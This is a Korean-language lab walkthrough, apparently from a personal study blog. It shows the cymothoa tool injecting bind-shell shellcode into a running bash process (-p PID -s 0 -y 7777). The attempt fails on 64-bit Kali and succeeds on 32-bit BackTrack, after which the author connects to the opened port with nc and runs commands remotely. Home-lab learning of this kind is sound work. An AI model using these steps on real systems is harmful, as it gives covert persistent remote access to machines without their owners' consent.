이번에는 OS 백도어에 대해 알아보자


OS 백도어는 프로세스에 백도어 셀코드를 삽입하는


스텔스(stealth) 백도어 공격이다


한번 사용해보자


cymothoa



도움말을 볼수 있다


ps aux 


(전체 프로세스 목록 보기)



엄청 많이 뜨는데 이중에서 


ps aux | grep bash 를 써보자 (| 이거는 백스페이스 왼쪽에있는 키이다)



맨 오른쪽을 보면 grep bash 명령어로 생긴 프로세스도 볼수 있고


/bin/bash 라고 2개가 있는걸 볼수있다


이건 터미널 창에서 명령을 입력하고 결과를 출력해주는걸


쉘(Shell)이라고 하는데 리눅스에서는 기본적으로 bash 라는 Shell을 쓴다


둘중에 아무거나 골라서 맨 왼쪽 root 옆에 숫자가 PID로


ps aux로 했을때 젤 먼저 나오는 줄에 나와있다


PID는 그때그때 다르니 자신껄 확인하고 사용하자


PID 4062인 /bin/bash 에 OS 백도어 공격을 해보자



cymothoa -S



툴이 가지고 있는 OS 백도어 공격의 쉘코드 목록이다


이제 PID 4062(/bin/bash) 에 OS 백도어 공격을 해보자


cymothoa -p 4062 -s 0 -y 7777


터미널이 꺼졌다가 켜진다..


다시 ps aux | grep bash 해서


/bin/bash의 PID를 알아내서 다시 실행해봤다



이번엔 터미널 창이 꺼졌다


처음 ps aux 에서는 /bin/bash가 두개가 켜져있어서 (이유는 잘..) 다시 켜진거 같고


두번째 ps aux 결과에서는 /bin/bash 가 하나이기 때문에 다시 안켜지고 꺼진거 같다


일단 OS 백도어 공격은 실패한건데


시스템쪽 공부를 아직 많이 안해서


이유는 정확하게 모르겠다


아마도.....추측이지만


프로세스에 쉘 코드를 삽입하는 공격인데


Kali는 64bit로 설치 했는데


cymothoa 는 32bit용 쉘코드로 공격을 하고있거 같다..


그래서 예상치 못한 쉘 코드가 들어가 프로세스가


비정상 종료 되는게 아닐까..



tail은 파일을 볼때 맨 아래부터 10줄(Default)을 보여달라는 명령어이고


-3 은 맨 아래서 부터3줄만 보여달라는 옵션이다


/var/log/messages 는 각종 로그가 기록되어지는 파일이다


kali 커널이 cymothoa에 의해서 문제가 생겼다는거 같다


나중에 공부 더 해서 왜 그런지 정확하게 알 수 있었으면 좋겠다..


그래서 여기서 OS 백도어 공격을 못해보고 넘어갈수는 없으니


BackTrack(32bit)에서 해보겠다


cd /pentest/backdoors/cymothoa


./cymothoa 를 쳐서 도움말을 볼 수 있고


./cymothoa -S (대문자 S)



여러가지 공격 방법 목록이 나온다


ps aux | grep bash



Kali와 다르게 bash가 많지만 아무거나 해도 된다


난 bash라고써있는 프로세스를 선택했다 (PID 17514)


./cymothoa -p 17514 -s 0 -y 7777


-p 는 pid 쓰는 옵션이고 -s 는 공격 방법 번호다 (./cymothoa -S 할때 나오는 번호)


-y 는 열어둘 포트 번호이다



Kali와 다르게 이번엔 infected!!! 라고 뜬다


공격이 성공했다


netstat -nltp 를 입력하여 7777포트가 열려있나 보자



중간에 보면


tcp 0    0    0.0.0.0:7777    0.0.0.0:*    LISTEN    17543/bash


라고 써있다


17543/bash 라고 써있고 7777포트가 열려 있는 걸 확인할수있다


이제 Kali를 가지고 BackTrack에 심어진 백도어 포트 7777을 이용해 접속해보자


Kali에서는 nc 라는 명령어를 이용한다


nc 192.168.0.237 7777


(BackTrack의 ip는 192.168.0.237 이다)



프롬프트는 안뜨지만 명령어를 입력하면 그 결과가 출력된다